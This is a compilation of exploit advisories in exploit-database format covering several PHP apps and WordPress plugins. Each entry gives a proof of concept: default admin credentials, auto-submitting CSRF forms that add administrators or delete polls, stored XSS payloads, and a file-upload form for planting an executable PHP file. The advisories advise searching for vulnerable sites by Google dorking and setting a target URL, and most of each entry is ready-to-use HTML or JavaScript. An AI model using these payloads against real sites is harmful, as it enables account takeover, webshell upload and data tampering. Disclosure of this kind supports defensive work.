<pre><code>====================================================================================================================================<br />| # Title : Car listing 1.6 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://demo.phpscriptpoint.com/carlisting/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin@gmail.com & pass = 1234<br /><br />[+] https://www/127.0.0.1/demo/phpscriptpointcom/carlisting/admin/<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code># Exploit Title: MapFig Studio <= 0.2.1 - Stored XSS via CSRF<br /># Date: 15-04-2024<br /># Exploit Author: Vuln Seeker Cybersecurity Team<br /># Vendor Homepage: https://wordpress.org/plugins/mapfig-studio/<br /># Version: <= 0.2.1<br /># Tested on: Firefox<br /># Contact me: vulns@vulnseeker.org<br /><br />Description<br /><br />The plugin does not have CSRF check in some places, and is missing<br />sanitisation as well as escaping, which could allow attackers to make<br />logged in admin add Stored XSS payloads via a CSRF attack<br /><br />Proof of Concept<br /><br />Have a logged in admin open a page containing:<br /><br /><html><br /> <body><br /> <form action="http://example.com/wp-admin/admin.php?page=studio_settings"<br />method="POST"><br /> <input type="hidden" name="studio_apikey"<br />value=""><script>alert(1)</script>" /><br /> <input type="hidden" name="studio_url"<br />value=""><script>alert(1)</script>" /><br /> <input type="hidden" name="save" value="Save!" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> <script><br /> history.pushState('', '', '/');<br /> document.forms[0].submit();<br /> </script><br /> </body><br /></html><br /><br />Reference:<br />https://wpscan.com/vulnerability/0346b62c-a856-4554-a24a-ef2c2943bda9/<br /></code></pre>
<pre><code># Exploit Title: profilepro <= 1.3 - Subscriber+ Stored Cross Site Scripting<br /># Date: 15-04-2024<br /># Exploit Author: Vuln Seeker Cybersecurity Team<br /># Vendor Homepage: https://wordpress.org/plugins/profilepro/<br /># Version: <= 1.3<br /># Tested on: Firefox<br /># Contact me: vulns@vulnseeker.org<br /><br />Description<br /><br />The plugin does not sanitise and escape some parameters and lacks proper<br />access controls, which could allow users with a role as low as subscriber<br />to perform Cross-Site Scripting attacks<br /><br />Proof of Concept<br /><br />Run the following code from the browser console from the subscriber user<br /><br />```<br />fetch("../wp-admin/admin-ajax.php", {<br /> method: "POST",<br /> headers: {<br /> "Accept": "*/*",<br /> "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",<br /> "X-Requested-With": "XMLHttpRequest"<br /> },<br /> body:<br />"title=%22%3E%3Cscript%3Ealert(1339)%3C%2Fscript%3E&label=&meta_key=&placeholder=&help_text=&privacy=1&max_length=&is_required=1&user_edit=1&icon=&type=textarea&action=profilepro_admin_add_custom_field&arg2=89",<br /> credentials: "include"<br />})<br />.then(response => {<br /> if (!response.ok) {<br /> throw new Error('Network response was not ok');<br /> }<br /> return response.text();<br />})<br />.then(data => console.log(data))<br />.catch(error => console.error('Error:', error));<br />```<br /><br />- As an admin, go to<br />http://example.com/wp-admin/edit.php?post_type=profilepro_form<br />- Choose the default profile, click on edit and click on add field, XSS<br />will pop up.<br /><br />Reference:<br />https://wpscan.com/vulnerability/8faf1409-44e6-4ebf-9a68-b5f93a5295e9/<br /></code></pre>
<pre><code># Exploit Title: Light Poll <= 1.0.0 - Polls Deletion via CSRF<br /># Date: 05-04-2024<br /># Exploit Author: Vuln Seeker Cybersecurity Team<br /># Vendor Homepage: https://wordpress.org/plugins/light-poll/<br /># Version: <=1.0.0<br /># Tested on: Firefox<br /># Contact me: vulns@vulnseeker.org<br /><br />Description<br /><br />The plugin does not have CSRF checks when deleting polls, which could allow<br />attackers to make logged in users perform such action via a CSRF attack<br /><br />Proof of Concept<br /><br /><html><br /> <body><br /> <form action="http://localhost/wp-admin/admin.php"><br /> <input type="hidden" name="page" value="lp_settings" /><br /> <input type="hidden" name="task" value="remove" /><br /> <input type="hidden" name="id" value="1" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> <script><br /> history.pushState('', '', '/');<br /> document.forms[0].submit();<br /> </script><br /> </body><br /></html><br /><br />Reference:<br />https://wpscan.com/vulnerability/d598eabd-a87a-4e3e-be46-a5c5cc3f130e/<br /><br /><br /><br /><br /># Exploit Title: Light Poll <= 1.0.0 - Poll Answers Deletion via CSRF<br /># Date: 05-04-2024<br /># Exploit Author: Vuln Seeker Cybersecurity Team<br /># Vendor Homepage: https://wordpress.org/plugins/light-poll/<br /># Version: <=1.0.0<br /># Tested on: Firefox<br /># Contact me: vulns@vulnseeker.org<br /><br />Description<br /><br />The plugin does not have CSRF checks in some places, which could allow<br />attackers to make logged in users perform unwanted actions via CSRF attacks<br /><br />Proof of Concept<br /><br />Where <<POLL_ID>> and <<ANSWER_ID>> are valid:<br /><br />https://example.com/wp-admin/admin.php?page=poll_settings&task=remove_answer&id=<br /><<POLL_ID>>&answer_id=<<ANSWER_ID>><br /><br />Reference:<br />https://wpscan.com/vulnerability/d1449be1-ae85-46f4-b5ba-390d25b87723/<br /></code></pre>
<pre><code># Exploit Title: PVN Auth Popup <= 1.0.0 - Admin+ Stored XSS<br /># Date: 08-04-2024<br /># Exploit Author: Vuln Seeker Cybersecurity Team<br /># Vendor Homepage: https://wordpress.org/plugins/pvn-auth-popup/<br /># Version: <= 1.0.0<br /># Tested on: Firefox<br /># Contact me: vulns@vulnseeker.org<br /><br />Description<br /><br />The plugin does not sanitise and escape some of its settings, which could<br />allow high privilege users such as admin to perform Stored Cross-Site<br />Scripting attacks even when the unfiltered_html capability is disallowed<br />(for example in multisite setup)<br />Proof of Concept<br /><br />1. Go to https://example.com/wp-admin/admin.php?page=pvn_auth_popup<br />2. In the first section, enter the payload `"><script>alert(1)</script>`<br />for the "Login text" input<br />3. Save and see the XSS<br /><br />Note: Other fields are likely vulnerable<br /><br />Reference:<br />https://wpscan.com/vulnerability/24685b19-0a44-411a-9e1b-d4d0627d7cb6/<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Giftora V 1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following HTML Add New posts .<br /><br />[+] Go to the line 10. Set the target site link Save changes and apply . <br /><br />[+] infected file : /admincp/new-post.<br /><br />[+] save code as poc.html <br /><br />[+] payload : <br /><br /></head><br /><body><br /> <div class="container"><br /> <div class="text-center" style="padding: 5px"><h3>User Edit</h3></div><br /> <form action="https://127.0.0.1/giftora.webister.net/admincp/controllers/submit_post" method="POST" enctype="multipart/form-data"><br /> <div hidden="true"><br /> <input type="text" name="id" id="id" value="1"><br /> </div><br /> <div><br /> <label for='email'>Email</label><input type="text" class="form-control" name='email' id='email' value="indoushka@mail.dz"><br /> </div><br /> <div><br /> <label for='password'>Password</label><input type="text" class="form-control" name='password' id='password' type='password' value="123456"><br /> </div><br /> <tr><br /> <div><br /> <label for='status'>Status</label><br /> <input type="radio" name="status" id="actiive" value="1" checked /> <label for="active">Active</label><br /> <input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label><br /> <br /> </div> <br /> <div style='height:80'><br /> <input type='submit' value='Submit'><input type='reset' Value='Reset'><br /> </div><br /> </form><br /> </div><br /><br /></body><br /></html><br />[+] demo https://127.0.0.1/giftora.webister.net/blog<br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Gas Agency Management 2022 Remote File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following html code uploads a executable malicious file remotely .<br /><br />[+] Go to the line 9.<br /><br />[+] Set the target site link Save changes and apply . <br /><br />[+] infected file : gasmark/manage_website.php.<br /><br />[+] save code as poc.html .<br /><br /><!DOCTYPE html><br /><html lang="ar"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>indoushak was here</title><br /></head><br /><body><br /> <form action="http://127.0.0.1/gasmark/manage_website.php" method="POST" enctype="multipart/form-data"><br /> <input type="hidden" name="old_website_image" value="old_website_image.jpg"><br /> <label for="website_image">S0M3 ThING baD:</label><br /> <input type="file" name="website_image" id="website_image"><br><br><br /><br /> <input type="submit" name="btn_web" value="do !T"><br /> </form><br /></body><br /></html><br /><br />[+] Path : http://127.0.0.1/gasmark/assets/uploadImage/Logo/ev!l.php<br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Farmacia Gama v1.0 v1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://download-media.code-projects.org/2020/04/Farmacia_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following HTML code add new admin .<br /><br />[+] Go to the line 10 Set the target site link Save changes and apply . <br /><br />[+] infected file : /main.php.<br /><br />[+] save code as poc.html <br /><br />[+] payload : <br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>Farmacia Form</title><br /></head><br /><body><br /> <h2>Farmacia User Form</h2><br /> <form action="http://127.0.0.1/farmacia-master/main.php" method="POST"><br /> <label for="nome">Nome:</label><br /> <input type="text" id="nome" name="nome" required><br><br><br /><br /> <label for="cargo">Cargo:</label><br /> <input type="text" id="cargo" name="cargo" required><br><br><br /><br /> <label for="usuario">Usuário:</label><br /> <input type="text" id="usuario" name="usuario" required><br><br><br /><br /> <label for="senha">Senha:</label><br /> <input type="password" id="senha" name="senha" required><br><br><br /><br /> <button type="submit" name="acao">Submit</button><br /> </form><br /></body><br /></html><br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Employees Pay Slip PDF Generator System 1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/pess_0.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This HTML page :<br /><br /> is a user registration form that allows users to input a username, password, and upload an avatar image. <br /> The form data is then sent via an AJAX request to a server-side script for processing.<br /><br />[+] Here's a breakdown of how it works:<br /><br /> HTML Structure<br /><br /> Form Elements:<br /> <br /> username: A text field where the user can input their username.<br /> password: A password field for entering a password.<br /> img: A file input for uploading an avatar image (restricted to image file types).<br /><br /> Save User Button:<br /> <br /> An input element with the type button is used to trigger the saveUser() function when clicked.<br /><br />[+] JavaScript (AJAX Request)<br /><br /> <br /> AJAX Request:<br /> <br /> An XMLHttpRequest object (xhr) is used to send the form data to a server-side script (Users.php).<br /> The request method is POST, and the data is sent to the specified URL.<br /> The onload function checks if the request was successful (status code 200). If it was,<br /> it alerts the user that the save was successful; otherwise, it alerts the user of an error.<br /><br />[+] save code as poc.html <br /><br />[+] payload : <br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>User Registration</title><br /></head><br /><body><br /><br /> <h2>User Registration</h2><br /> <form id="userForm" enctype="multipart/form-data"><br /> <label for="username">Username:</label><br /> <input type="text" id="username" name="username" required><br><br><br /><br /> <label for="password">Password:</label><br /> <input type="password" id="password" name="password" required><br><br><br /><br /> <input type="button" value="Save User" onclick="saveUser()"><br /> </form><br /><br /> <script><br /> function saveUser() {<br /> var form = document.getElementById('userForm');<br /> var formData = new FormData(form);<br /><br /> var xhr = new XMLHttpRequest();<br /> xhr.open("POST", "http://127.0.0.1/pess/classes/Users.php?f=save", true);<br /><br /> xhr.onload = function () {<br /> if (xhr.status === 200) {<br /> alert('User saved successfully');<br /> } else {<br /> alert('An error occurred while saving the user');<br /> }<br /> };<br /><br /> xhr.send(formData);<br /> }<br /> </script><br /><br /></body><br /></html><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Bakery Shop Management System 1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/bsms_0.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This HTML code :<br /><br /> represents a simple user form that collects data for a user (like a username, password, and user type) and submits it to a server using AJAX. <br /> Let me break down the key components of this code:<br /> <br />[+] HTML Structure<br /><br /> Container & Form:<br /> <br /> <div class="container-fluid">: This div serves as a container for the form and ensures that it will take up the full width of its parent container.<br /> <form action="" id="user-form">: This form collects user data. The action attribute is empty, <br /> meaning the form doesn't submit in the traditional way (it's handled via JavaScript instead).<br /><br /> Hidden Input:<br /> <input type="hidden" name="id" value="">: This hidden input is used to store the user ID. It might be used for editing an existing user where the user ID <br /> is sent back to the server but isn't visible to the user.<br /><br />[+] Form Fields:<br /><br /> Full Name:<br /><br /> <label for="fullname" class="control-label">Username</label><br /> <input type="text" name="fullname" id="fullname" required class="form-control form-control-sm rounded-0" value=""><br /><br /> This field is actually mislabeled—the label says "Username," but the input is for the user's full name. <br /> The input field is styled using Bootstrap classes.<br /><br /> Username:<br /><br /> <label for="username" class="control-label">Password</label><br /> <input type="text" name="username" id="username" required class="form-control form-control-sm rounded-0" value=""><br /><br />[+] Similarly, this field is labeled as "Password," but the input is meant for the username. The input type should be password instead of text for security reasons.<br /><br />[+] User Type:<br /><br /> <label for="type" class="control-label">Type</label><br /> <select name="type" id="type" class="form-select form-select-sm rounded-0" required><br /> <option value="1">Administrator</option><br /> <option value="0">Cashier</option><br /> </select><br /><br /> This dropdown allows the user to select their type—either "Administrator" or "Cashier." The selected value (1 or 0) is sent to the server.<br /><br />[+] Submit Button: <br /><br /> <button type="submit" class="btn btn-primary">Save</button>: This button submits the form. It's styled as a primary button using Bootstrap.<br /><br />[+] JavaScript (jQuery)<br /><br /> Form Submission Handling:<br /> $(function(){ ... }): This is a jQuery shorthand for $(document).ready(), meaning the function runs after the DOM is fully loaded.<br /> $('#user-form').submit(function(e){ ... }): This function handles the form submission. <br /> The default form submission behavior is prevented (e.preventDefault()), meaning the form doesn't reload the page.<br /><br /> Message Handling:<br /> $('.pop_msg').remove();: This removes any previous pop-up messages before submitting the form.<br /> _el.addClass('pop_msg'): Creates a new element for displaying messages (e.g., success or error messages).<br /><br /> AJAX Request:<br /> $.ajax({ ... }): Sends the form data to the server without reloading the page.<br /> URL: The form is submitted to http://127.0.0.1/bsms/Actions.php?a=save_user.<br /> Method: The data is sent using the POST method.<br /> Data: The form data is serialized (_this.serialize()) and sent as JSON.<br /> Error Handling:<br /> If an error occurs, the script logs it to the console and displays an error message (which currently says "Yes Mother fucker !"<br /> —this is an inappropriate message and should be corrected to something like "An error occurred.").<br /> Success Handling:<br /> If the submission is successful, the form is reset, a success message is shown, and the page may reload after a short delay.<br /> If the submission fails, the error message from the server response is displayed.<br /> <br />[+] Line 36 : Set your target url<br /><br />[+] save payload as poc.html <br /><br />[+] payload : <br /><br /><div class="container-fluid"><br /> <form action="" id="user-form"><br /> <input type="hidden" name="id" value=""><br /> <div class="form-group"><br /> <label for="fullname" class="control-label">Username</label><br /> <input type="text" name="fullname" id="fullname" required class="form-control form-control-sm rounded-0" value=""><br /> </div><br /> <div class="form-group"><br /> <label for="username" class="control-label">Password</label><br /> <input type="text" name="username" id="username" required class="form-control form-control-sm rounded-0" value=""><br /> </div><br /> <div class="form-group"><br /> <label for="type" class="control-label">Type</label><br /> <select name="type" id="type" class="form-select form-select-sm rounded-0" required><br /> <option value="1">Administrator</option><br /> <option value="0">Cashier</option><br /> </select><br /> </div><br /> <button type="submit" class="btn btn-primary">Save</button><br /> </form><br /></div><br /><br /><script src="https://code.jquery.com/jquery-3.6.0.min.js"></script><br /><script><br /> $(function(){<br /> $('#user-form').submit(function(e){<br /> e.preventDefault();<br /> $('.pop_msg').remove(); // Remove any previous pop-up messages<br /><br /> var _this = $(this);<br /> var _el = $('<div>').addClass('pop_msg');<br /><br /> $('#user-form button[type="submit"]').attr('disabled', true).text('Submitting form...');<br /><br /> $.ajax({<br /> url: 'http://127.0.0.1/bsms/Actions.php?a=save_user',<br /> method: 'POST',<br /> data: _this.serialize(),<br /> dataType: 'JSON',<br /> error: function(err) {<br /> console.log(err);<br /> _el.addClass('alert alert-danger').text("Yes Mother fucker !");<br /> _this.prepend(_el);<br /> _el.show('slow');<br /> $('#user-form button[type="submit"]').attr('disabled', false).text('Save');<br /> },<br /> success: function(resp) {<br /> if (resp.status == 'success') {<br /> _el.addClass('alert alert-success').text(resp.msg);<br /> _this.prepend(_el);<br /> _el.show('slow');<br /><br /> $('#user-form').get(0).reset(); // Reset form after successful submission<br /><br /> // Optional: reload page after a short delay<br /> setTimeout(function() {<br /> location.reload();<br /> }, 2000);<br /><br /> } else {<br /> _el.addClass('alert alert-danger').text(resp.msg);<br /> _this.prepend(_el);<br /> _el.show('slow');<br /> }<br /><br /> $('#user-form button[type="submit"]').attr('disabled', false).text('Save');<br /> }<br /> });<br /> });<br /> });<br /> <br /></script><br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>